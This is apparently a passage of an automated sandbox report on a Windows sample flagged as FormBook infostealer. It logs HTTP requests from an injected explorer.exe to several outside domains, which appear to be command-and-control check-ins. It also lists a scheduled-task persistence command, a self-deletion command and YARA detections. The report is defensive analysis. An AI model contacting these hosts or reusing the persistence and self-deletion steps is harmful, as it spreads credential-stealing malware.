                                            Data Ascii: <a href="https://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&amp;a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY">Moved Permanently</a>.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.349789103.72.144.1980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:24.818169117 CEST4165OUTGET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.syzhtr.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:25.132343054 CEST4165INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 15 Sep 2021 08:10:24 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.34979034.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:30.286042929 CEST4166OUTGET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1
                                            Host: www.tjandamber.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:30.401585102 CEST4166INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139efab-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.34979199.83.154.11880C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:40.511245966 CEST4167OUTGET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1
                                            Host: www.realstylecelebz.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:40.680717945 CEST4168INHTTP/1.1 403 Forbidden
                                            Date: Wed, 15 Sep 2021 08:10:40 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Server: nginx
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.34979234.98.99.3080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:45.754266024 CEST4169OUTGET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.dressmids.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:45.871160984 CEST4169INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139ed55-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            9192.168.2.34979391.195.240.9480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:50.931049109 CEST4170OUTGET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1
                                            Host: www.discomountainkombucha.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:50.960297108 CEST4171INHTTP/1.1 301 Moved Permanently
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd
                                            Date: Wed, 15 Sep 2021 08:10:50 GMT
                                            Content-Length: 179
                                            Connection: close
                                            Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 73 63 6f 6d 6f 75 6e 74 61 69 6e 6b 6f 6d 62 75 63 68 61 2e 63 6f 6d 2f 76 75 6a 61 2f 3f 53 72 4b 30 6d 3d 38 70 62 4c 75 38 6c 30 53 56 31 6c 6f 26 61 6d 70 3b 61 36 50 4c 64 48 36 3d 76 48 4b 68 44 66 64 7a 33 51 6a 79 6f 55 75 61 4b 30 66 4b 58 33 6b 36 76 4e 55 64 78 68 4e 30 30 67 44 6c 4a 54 32 68 54 66 58 4e 74 64 6f 42 66 57 57 64 4e 62 48 41 4d 6e 59 33 66 48 6e 6e 37 41 71 64 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                            Data Ascii: <a href="https://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&amp;a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd">Moved Permanently</a>.


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:10:08:30
                                            Start date:15/09/2021
                                            Path:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\tgamf4XuLa.exe'
                                            Imagebase:0x6a0000
                                            File size:548352 bytes
                                            MD5 hash:F8146A71DEDC3EEEAA1624D6832C39A4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:10:08:34
                                            Start date:15/09/2021
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
                                            Imagebase:0x9f0000
                                            File size:185856 bytes
                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:10:08:35
                                            Start date:15/09/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:10:08:35
                                            Start date:15/09/2021
                                            Path:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            Imagebase:0x860000
                                            File size:548352 bytes
                                            MD5 hash:F8146A71DEDC3EEEAA1624D6832C39A4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:10:08:38
                                            Start date:15/09/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff714890000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:10:09:17
                                            Start date:15/09/2021
                                            Path:C:\Windows\SysWOW64\control.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\control.exe
                                            Imagebase:0xe60000
                                            File size:114688 bytes
                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:10:09:26
                                            Start date:15/09/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
                                            Imagebase:0xbd0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:10:09:26
                                            Start date:15/09/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >